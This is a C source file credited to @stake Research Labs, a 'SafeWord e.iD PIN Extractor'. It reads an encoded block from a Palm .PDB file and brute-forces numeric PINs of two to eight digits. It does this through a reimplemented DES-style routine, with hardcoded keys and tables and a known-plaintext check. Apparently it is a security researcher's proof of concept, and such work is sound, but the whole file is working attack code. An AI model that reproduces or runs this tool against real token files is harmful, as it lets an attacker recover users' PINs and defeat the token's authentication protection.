/* 
 * Secure Computing SafeWord e.iD PIN Extractor
 *
 * Kingpin, @stake Research Labs
 * kingpin@atstake.com
 * http://www.atstake.com/research
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


// typedefs

typedef unsigned char c_block[8];
typedef unsigned char p_block[9]; // ASCII pin up to 8 in length (+ NULL)

// constants

unsigned char constantPad1[] = {0xff, 0x45, 0x6E, 0x69, 0x67, 0x6d, 0x61, 0x80}; /* ASCII (Enigma) */
unsigned char constantPad2[] = {0x03, 0xce, 0x4a, 0xa3, 0x56, 0x77, 0xf2, 0x91}; 
unsigned char constantPad3[] = {0xff, 0x4c, 0x6f, 0x67, 0x69, 0x63, 0x2c, 0x80}; /* ASCII (Logic) */

unsigned char constantTrans1[] = {0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02, // lookup tables
								  0x3c, 0x34, 0x2c, 0x24, 0x1c, 0x14, 0x0c, 0x04, 
								  0x3e, 0x36, 0x2e, 0x26, 0x1e, 0x16, 0x0e, 0x06,
								  0x40, 0x38, 0x30, 0x28, 0x20, 0x18, 0x10, 0x08,
								  0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01,
								  0x3b, 0x33, 0x2b, 0x23, 0x1b, 0x13, 0x0b, 0x03,
								  0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05,
								  0x3f, 0x37, 0x2f, 0x27, 0x1f, 0x17, 0x0f, 0x07};

unsigned char constantTrans2[] = {0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01,
								  0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02,
								  0x3b, 0x33, 0x2b, 0x23, 0x1b, 0x13, 0x0b, 0x03,
								  0x3c, 0x34, 0x2c, 0x24, 0x3f, 0x37, 0x2f, 0x27,
								  0x1f, 0x17, 0x0f, 0x07, 0x3e, 0x36, 0x2e, 0x26,
								  0x1e, 0x16, 0x0e, 0x06, 0x3d, 0x35, 0x2d, 0x25,
								  0x1d, 0x15, 0x0d, 0x05, 0x1c, 0x14, 0x0c, 0x04};

unsigned char constantTrans3[] = {0x0e, 0x11, 0x0b, 0x18, 0x01, 0x05, 0x03, 0x1c,
								  0x0f, 0x06, 0x15, 0x0a, 0x17, 0x13, 0x0c, 0x04,
								  0x1a, 0x08, 0x10, 0x07, 0x1b, 0x14, 0x0d, 0x02,
								  0x45, 0x50, 0x3b, 0x41, 0x4b, 0x53, 0x3a, 0x44,
								  0x4f, 0x49, 0x3d, 0x4c, 0x48, 0x4d, 0x43, 0x54,
								  0x3e, 0x51, 0x4a, 0x46, 0x4e, 0x40, 0x39, 0x3c};

unsigned char constantTrans4[] = {0x20, 0x01, 0x02, 0x03, 0x04, 0x05, 0x04, 0x05,
								  0x06, 0x07, 0x08, 0x09, 0x08, 0x09, 0x0a, 0x0b,
								  0x0c, 0x0d, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11,
								  0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x14, 0x15,
								  0x16, 0x17, 0x18, 0x19, 0x18, 0x19, 0x1a, 0x1b,
								  0x1c, 0x1d, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x01};

unsigned char constantTrans5[] = {0x10, 0x07, 0x14, 0x15, 0x1d, 0x0c, 0x1c, 0x11,
								  0x01, 0x0f, 0x17, 0x1a, 0x05, 0x12, 0x1f, 0x0a,
								  0x02, 0x08, 0x18, 0x0e, 0x20, 0x1b, 0x03, 0x09,
								  0x13, 0x0d, 0x1e, 0x06, 0x16, 0x0b, 0x04, 0x19};


unsigned char constantLookup[] = {0x0e, 0x00, 0x04, 0x0f, 0x0d, 0x07, 0x01, 0x04, 0x02, 0x0e, 0x0f, 0x02, 0x0b, 0x0d, 0x08, 0x01,
								  0x03, 0x0a, 0x0a, 0x06, 0x06, 0x0c, 0x0c, 0x0b, 0x05, 0x09, 0x09, 0x05, 0x00, 0x03, 0x07, 0x08,
								  0x04, 0x0f, 0x01, 0x0c, 0x0e, 0x08, 0x08, 0x02, 0x0d, 0x04, 0x06, 0x09, 0x02, 0x01, 0x0b, 0x07,
								  0x0f, 0x05, 0x0c, 0x0b, 0x09, 0x03, 0x07, 0x0e, 0x03, 0x0a, 0x0a, 0x00, 0x05, 0x06, 0x00, 0x0d,
								  0x0f, 0x03, 0x01, 0x0d, 0x08, 0x04, 0x0e, 0x07, 0x06, 0x0f, 0x0b, 0x02, 0x03, 0x08, 0x04, 0x0e,
								  0x09, 0x0c, 0x07, 0x00, 0x02, 0x01, 0x0d, 0x0a, 0x0c, 0x06, 0x00, 0x09, 0x05, 0x0b, 0x0a, 0x05,
								  0x00, 0x0d, 0x0e, 0x08, 0x07, 0x0a, 0x0b, 0x01, 0x0a, 0x03, 0x04, 0x0f, 0x0d, 0x04, 0x01, 0x02,
								  0x05, 0x0b, 0x08, 0x06, 0x0c, 0x07, 0x06, 0x0c, 0x09, 0x00, 0x03, 0x05, 0x02, 0x0e, 0x0f, 0x09,
								  0x0a, 0x0d, 0x00, 0x07, 0x09, 0x00, 0x0e, 0x09, 0x06, 0x03, 0x03, 0x04, 0x0f, 0x06, 0x05, 0x0a,
								  0x01, 0x02, 0x0d, 0x08, 0x0c, 0x05, 0x07, 0x0e, 0x0b, 0x0c, 0x04, 0x0b, 0x02, 0x0f, 0x08, 0x01,
								  0x0d, 0x01, 0x06, 0x0a, 0x04, 0x0d, 0x09, 0x00, 0x08, 0x06, 0x0f, 0x09, 0x03, 0x08, 0x00, 0x07,
								  0x0b, 0x04, 0x01, 0x0f, 0x02, 0x0e, 0x0c, 0x03, 0x05, 0x0b, 0x0a, 0x05, 0x0e, 0x02, 0x07, 0x0c,
								  0x07, 0x0d, 0x0d, 0x08, 0x0e, 0x0b, 0x03, 0x05, 0x00, 0x06, 0x06, 0x0f, 0x09, 0x00, 0x0a, 0x03,
								  0x01, 0x04, 0x02, 0x07, 0x08, 0x02, 0x05, 0x0c, 0x0b, 0x01, 0x0c, 0x0a, 0x04, 0x0e, 0x0f, 0x09,
								  0x0a, 0x03, 0x06, 0x0f, 0x09, 0x00, 0x00, 0x06, 0x0c, 0x0a, 0x0b, 0x01, 0x07, 0x0d, 0x0d, 0x08,
								  0x0f, 0x09, 0x01, 0x04, 0x03, 0x05, 0x0e, 0x0b, 0x05, 0x0c, 0x02, 0x07, 0x08, 0x02, 0x04, 0x0e,
								  0x02, 0x0e, 0x0c, 0x0b, 0x04, 0x02, 0x01, 0x0c, 0x07, 0x04, 0x0a, 0x07, 0x0b, 0x0d, 0x06, 0x01,
								  0x08, 0x05, 0x05, 0x00, 0x03, 0x0f, 0x0f, 0x0a, 0x0d, 0x03, 0x00, 0x09, 0x0e, 0x08, 0x09, 0x06,
								  0x04, 0x0b, 0x02, 0x08, 0x01, 0x0c, 0x0b, 0x07, 0x0a, 0x01, 0x0d, 0x0e, 0x07, 0x02, 0x08, 0x0d,
								  0x0f, 0x06, 0x09, 0x0f, 0x0c, 0x00, 0x05, 0x09, 0x06, 0x0a, 0x03, 0x04, 0x00, 0x05, 0x0e, 0x03,
								  0x0c, 0x0a, 0x01, 0x0f, 0x0a, 0x04, 0x0f, 0x02, 0x09, 0x07, 0x02, 0x0c, 0x06, 0x09, 0x08, 0x05,
								  0x00, 0x06, 0x0d, 0x01, 0x03, 0x0d, 0x04, 0x0e, 0x0e, 0x00, 0x07, 0x0b, 0x05, 0x03, 0x0b, 0x08,
								  0x09, 0x04, 0x0e, 0x03, 0x0f, 0x02, 0x05, 0x0c, 0x02, 0x09, 0x08, 0x05, 0x0c, 0x0f, 0x03, 0x0a,
								  0x07, 0x0b, 0x00, 0x0e, 0x04, 0x01, 0x0a, 0x07, 0x01, 0x06, 0x0d, 0x00, 0x0b, 0x08, 0x06, 0x0d,
								  0x04, 0x0d, 0x0b, 0x00, 0x02, 0x0b, 0x0e, 0x07, 0x0f, 0x04, 0x00, 0x09, 0x08, 0x01, 0x0d, 0x0a,
								  0x03, 0x0e, 0x0c, 0x03, 0x09, 0x05, 0x07, 0x0c, 0x05, 0x02, 0x0a, 0x0f, 0x06, 0x08, 0x01, 0x06,
								  0x01, 0x06, 0x04, 0x0b, 0x0b, 0x0d, 0x0d, 0x08, 0x0c, 0x01, 0x03, 0x04, 0x07, 0x0a, 0x0e, 0x07,
								  0x0a, 0x09, 0x0f, 0x05, 0x06, 0x00, 0x08, 0x0f, 0x00, 0x0e, 0x05, 0x02, 0x09, 0x03, 0x02, 0x0c,
								  0x0d, 0x01, 0x02, 0x0f, 0x08, 0x0d, 0x04, 0x08, 0x06, 0x0a, 0x0f, 0x03, 0x0b, 0x07, 0x01, 0x04,
								  0x0a, 0x0c, 0x09, 0x05, 0x03, 0x06, 0x0e, 0x0b, 0x05, 0x00, 0x00, 0x0e, 0x0c, 0x09, 0x07, 0x02,
								  0x07, 0x02, 0x0b, 0x01, 0x04, 0x0e, 0x01, 0x07, 0x09, 0x04, 0x0c, 0x0a, 0x0e, 0x08, 0x02, 0x0d,
								  0x00, 0x0f, 0x06, 0x0c, 0x0a, 0x09, 0x0d, 0x00, 0x0f, 0x03, 0x03, 0x05, 0x05, 0x06, 0x08, 0x0b};

// declarations

void crack (p_block pin);
void L321 (c_block output, p_block pin);
void L315 (c_block output, p_block pin, c_block constant);
void L377 (c_block output, p_block pin, c_block constant);
void L374 (unsigned char* input);
void L347 (c_block constant, int decode);
void L345 (unsigned char *input, unsigned char *output);
void L363 (unsigned char *input);
void L371 (unsigned char *input);
void L402 (c_block output, c_block pdb, c_block compare);

// globals

unsigned long count = 0; // hash mark counter
unsigned char big_const[768];
unsigned char big_pin[96];
unsigned char expand_const[64];
unsigned char pdb[16];
p_block pin = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};


int main (int argc, char **argv)
{
	FILE *file;

	if (argc == 1)
   	{
  		fprintf(stdout, "\nUsage: %s <.PDB filename>\n", argv[0]);
        return 1;
    }      

    fprintf(stdout, "\nSecure Computing SafeWord e.iD PIN Extractor\n");
    fprintf(stdout, "kingpin@atstake.com\n");
    fprintf(stdout, "@stake Research Labs\n");
    fprintf(stdout, "http://www.atstake.com/research\n\n");

	if ((file = fopen(argv[1], "rb")) == NULL)
	{
		fprintf(stderr, "Missing input file %s.\n\n", argv[1]);
		return 1;
	}

	fseek(file, 122L /* -2 for POSE */, SEEK_SET); // retreive encoded block from pdb
	if (fread(pdb, 1, 16, file) != 16)
	{
		fprintf(stderr, "Error getting ciphertext string.\n\n");
		return 1;
	}

	fclose(file);

	fprintf(stdout, "%2.2X%2.2X %2.2X%2.2X %2.2X%2.2X %2.2X%2.2X ",
                pdb[0],pdb[1],pdb[2],pdb[3],pdb[4],pdb[5],pdb[6],pdb[7]);
	fprintf(stdout, "%2.2X%2.2X %2.2X%2.2X %2.2X%2.2X %2.2X%2.2X\n\n",
                pdb[8],pdb[9],pdb[10],pdb[11],pdb[12],pdb[13],pdb[14],pdb[15]);

	
	// PIN length between 2 and 8 characters
	for (pin[0] = '0'; pin[0] <= '9'; ++pin[0])
	for (pin[1] = '0'; pin[1] <= '9'; ++pin[1])
		crack(pin);

	for (pin[0] = '0'; pin[0] <= '9'; ++pin[0])
	for (pin[1] = '0'; pin[1] <= '9'; ++pin[1])
	for (pin[2] = '0'; pin[2] <= '9'; ++pin[2])
		crack(pin);

	for (pin[0] = '0'; pin[0] <= '9'; ++pin[0])
	for (pin[1] = '0'; pin[1] <= '9'; ++pin[1])
	for (pin[2] = '0'; pin[2] <= '9'; ++pin[2])
	for (pin[3] = '0'; pin[3] <= '9'; ++pin[3])
		crack(pin);

	for (pin[0] = '0'; pin[0] <= '9'; ++pin[0])
	for (pin[1] = '0'; pin[1] <= '9'; ++pin[1])
	for (pin[2] = '0'; pin[2] <= '9'; ++pin[2])
	for (pin[3] = '0'; pin[3] <= '9'; ++pin[3])
	for (pin[4] = '0'; pin[4] <= '9'; ++pin[4])
		crack(pin);

	for (pin[0] = '0'; pin[0] <= '9'; ++pin[0])
	for (pin[1] = '0'; pin[1] <= '9'; ++pin[1])
	for (pin[2] = '0'; pin[2] <= '9'; ++pin[2])
	for (pin[3] = '0'; pin[3] <= '9'; ++pin[3])
	for (pin[4] = '0'; pin[4] <= '9'; ++pin[4])
	for (pin[5] = '0'; pin[5] <= '9'; ++pin[5])
		crack(pin);

	for (pin[0] = '0'; pin[0] <= '9'; ++pin[0])
	for (pin[1] = '0'; pin[1] <= '9'; ++pin[1])
	for (pin[2] = '0'; pin[2] <= '9'; ++pin[2])
	for (pin[3] = '0'; pin[3] <= '9'; ++pin[3])
	for (pin[4] = '0'; pin[4] <= '9'; ++pin[4])
	for (pin[5] = '0'; pin[5] <= '9'; ++pin[5])
	for (pin[6] = '0'; pin[6] <= '9'; ++pin[6])
		crack(pin);

	for (pin[0] = '0'; pin[0] <= '9'; ++pin[0])
	for (pin[1] = '0'; pin[1] <= '9'; ++pin[1])
	for (pin[2] = '0'; pin[2] <= '9'; ++pin[2])
	for (pin[3] = '0'; pin[3] <= '9'; ++pin[3])
	for (pin[4] = '0'; pin[4] <= '9'; ++pin[4])
	for (pin[5] = '0'; pin[5] <= '9'; ++pin[5])
	for (pin[6] = '0'; pin[6] <= '9'; ++pin[6])
	for (pin[7] = '0'; pin[7] <= '9'; ++pin[7])
		crack(pin);

	fprintf(stdout, "\n\nNo PIN found.\n");
	return (0);
}

void crack (p_block pin)
{
	c_block output;
	unsigned char compare[16];

	++count;
	if ((count % 100000) == 0)
	{
		fprintf(stdout, "#");
		fflush(stdout);
	}

	L321 (output, pin);
	
	// do PDB in 8-byte sections
	L402 (output, pdb, compare);
	
	// save time by comparing first 8 bytes before computing the next half
	if (memcmp(compare, "PLNCGAHE", 8) == 0) // so far, so good
	{
		L402 (output, pdb+8, compare+8);
		if (memcmp(compare+8, "NDHHLM", 6) == 0) // pin is good!
		{
			fprintf(stdout, "\n\nPIN: %s\n", pin);
			exit(0);
		}
	}
}

void L321 (c_block output, p_block pin)
{
	c_block output1, output2, output3;
	int i;

	L315 (output1, pin, constantPad1); // 3 rounds, different constant blocks
	L315 (output2, pin, constantPad2);
	L315 (output3, pin, constantPad3);

	for (i = 0; i < 8; ++i)
	{
		output[i] = output1[i] ^ output2[i] ^ output3[i];
	}
}

void L315 (c_block output, p_block pin, c_block constant)
{
	int i, len;
	p_block padded_pin;
	
	len = strlen(pin);
	memcpy(padded_pin, pin, 9);

	// if pin less than 8 characters, pad with constant
	if (len < 8)
		for (i = 0; i < 8 - len; ++i)
			padded_pin[len + i] = constant[i];

	L377 (output, padded_pin, constant);

	for (i = 0; i < 8; ++i)
		output[i] ^= padded_pin[i];
}

void L377 (c_block output, p_block pin, c_block constant)
{
	int i, j, k;
	unsigned char temp;
	unsigned char pad[64];

	L347 (constant, 0);

	// expand
	// $3030 3030 3030 30FF
	// $30 = 0011 0000
	// output of loop = $0000 0101 0000 0000
	for (i = 0, j = 0; j < 64; ++i, j += 8)
	{
		temp = pin[i];

		for (k = 7; k >= 0; --k)
		{
			pad[j + k] = temp & 0x1;
			temp >>= 1;
		}
	}

	L374 (pad);

	// regroup
	// output = 0101 0001 0000 0101 0000 0100....
	//        = 1101 0011 0010 = D32...
	j = 0;
	for (i = 0; i < 8; ++i)
	{
		output[i] = 0;

		for (k = 0; k < 4; ++k)
		{
			output[i] <<= 1;
			output[i] |= (pad[j] & 0x1);
			++j;
		}
	
		// hex to ascii
		if (output[i] >=0 && output[i] <= 9)
			output[i] += 0x30;
		else if (output[i] >= 0xA && output[i] <= 0xF)
			output[i] += 0x37;	
	}
}

void L374 (unsigned char* input)
{
	int i;

	// L355
	// build table
	for (i = 0; i < 64; ++i)
		big_pin[i+32] = input[constantTrans1[i] - 1];
	memcpy(big_pin, big_pin+64, 32); // repeat 32 bytes

	L363 (&big_const[0]);
	L371 (&big_pin[32]);
	L363 (&big_const[48]);
	L371 (&big_pin[64]);
	L363 (&big_const[96]);
	L371 (&big_pin[32]);
	L363 (&big_const[144]);
	L371 (&big_pin[64]);
	L363 (&big_const[192]);
	L371 (&big_pin[32]);
	L363 (&big_const[240]);
	L371 (&big_pin[64]);
	L363 (&big_const[288]);
	L371 (&big_pin[32]);
	L363 (&big_const[336]);
	L371 (&big_pin[64]);
	L363 (&big_const[384]);
	L371 (&big_pin[32]);
	L363 (&big_const[432]);
	L371 (&big_pin[64]);
	L363 (&big_const[480]);
	L371 (&big_pin[32]);
	L363 (&big_const[528]);
	L371 (&big_pin[64]);
	L363 (&big_const[576]);
	L371 (&big_pin[32]);
	L363 (&big_const[624]);
	L371 (&big_pin[64]);
	L363 (&big_const[672]);
	L371 (&big_pin[32]);
	L363 (&big_const[720]);

	for (i = 0; i < 32; ++i)
		big_pin[i] ^= big_pin[64 + i];

	// L359
	for (i = 0; i < 64; ++i)
		input[constantTrans1[i] - 1] = big_pin[i];
}

void L347 (c_block constant, int decode)
{
	int i, j;
	unsigned char out[112];

	// expand out constant
	for (i = 0; i < 8; ++i)
		for (j = 0; j < 8; ++j)
			expand_const[j + 8*i] = constant[i] >> (7-j);

	// build table
	for (i = 0; i < 28; ++i)
	{
		out[i] = expand_const[constantTrans2[i] - 1];
		out[i+28] = out[i]; // repeat 28 bytes
	}
	for (i = 56; i < 84; ++i)
	{
		out[i] = expand_const[constantTrans2[i - 28] - 1];
		out[i+28] = out[i]; // repeat 28 bytes
	}

	// some type of rotor?
	if (!decode)
	{
		L345 (&out[1], &big_const[0]);
		L345 (&out[2], &big_const[48]);
		L345 (&out[4], &big_const[96]);
		L345 (&out[6], &big_const[144]);
		L345 (&out[8], &big_const[192]);
		L345 (&out[10], &big_const[240]);
		L345 (&out[12], &big_const[288]);
		L345 (&out[14], &big_const[336]);
		L345 (&out[15], &big_const[384]);
		L345 (&out[17], &big_const[432]);
		L345 (&out[19], &big_const[480]);
		L345 (&out[21], &big_const[528]);
		L345 (&out[23], &big_const[576]);
		L345 (&out[25], &big_const[624]);
		L345 (&out[27], &big_const[672]);
		L345 (&out[28], &big_const[720]);
	}
	else
	{
		L345 (&out[1], &big_const[720]);
		L345 (&out[2], &big_const[672]);
		L345 (&out[4], &big_const[624]);
		L345 (&out[6], &big_const[576]);
		L345 (&out[8], &big_const[528]);
		L345 (&out[10], &big_const[480]);
		L345 (&out[12], &big_const[432]);
		L345 (&out[14], &big_const[384]);
		L345 (&out[15], &big_const[336]);
		L345 (&out[17], &big_const[288]);
		L345 (&out[19], &big_const[240]);
		L345 (&out[21], &big_const[192]);
		L345 (&out[23], &big_const[144]);
		L345 (&out[25], &big_const[96]);
		L345 (&out[27], &big_const[48]);
		L345 (&out[28], &big_const[0]);
	}
}

void L345(unsigned char *input, unsigned char *output)
{
	int i;

	for (i = 0; i < 48; ++i)
		output[i] = input[constantTrans3[i] - 1];
}

void L363 (unsigned char *input)
{
	int i, j;
	unsigned char temp, pad[48], expand_table[32];
	c_block table;

	for (i = 0; i < 48; ++i)
	{
		temp = big_pin[constantTrans4[i] - 1];
		pad[i] = input[i] ^ temp;
	}

	for (i = 0; i < 8; ++i)
	{
		temp = 0;

		for (j = 0; j < 6; ++j)
		{
			temp <<= 1;
			temp |= (pad[j + 6*i] & 0x1);
		}

		table[i] = constantLookup[temp + 64*i];
	}

	// expand out
	for (i = 0; i < 8; ++i)
		for (j = 0; j < 4; ++j)
			expand_table[j + 4*i] = table[i] >> (3-j);

	for (i = 0; i < 32; ++i)
		big_pin[i] = expand_table[constantTrans5[i] - 1];	
}

void L371 (unsigned char *input)
{
	int i;
	unsigned char temp;

	for (i = 0; i < 32; ++i)
	{
		temp = input[i] ^ big_pin[i];
		input[i] = temp;
		big_pin[i] = temp;
	}
}

void L402 (c_block output, c_block pdb, c_block compare)
{
	int i, j, k;
	unsigned char temp;
	unsigned char pad[64];

	L347 (output, 1);
		
  	// expand
	// $3030 3030 3030 30FF
	// $30 = 0011 0000
	// output of loop = $0000 0101 0000 0000
	for (i = 0, j = 0; j < 64; ++i, j += 8)
	{
		temp = pdb[i];

		for (k = 7; k >= 0; --k)
		{
			pad[j + k] = temp & 0x1;
			temp >>= 1;
		}
	}

	L374 (pad);

	// L399
	// regroup

	// output = 0101 0001 0000 0101 0000 0100....
	//        = 1101 0011 0010 = D32...
	for (i = 0; i < 8; ++i)
	{
		temp = 0;

		for (j = 0; j < 8; ++j)
		{
			temp <<= 1;
			temp |= (pad[j + 8*i] & 0x1);
		}

		compare[i] = temp;
	}
}
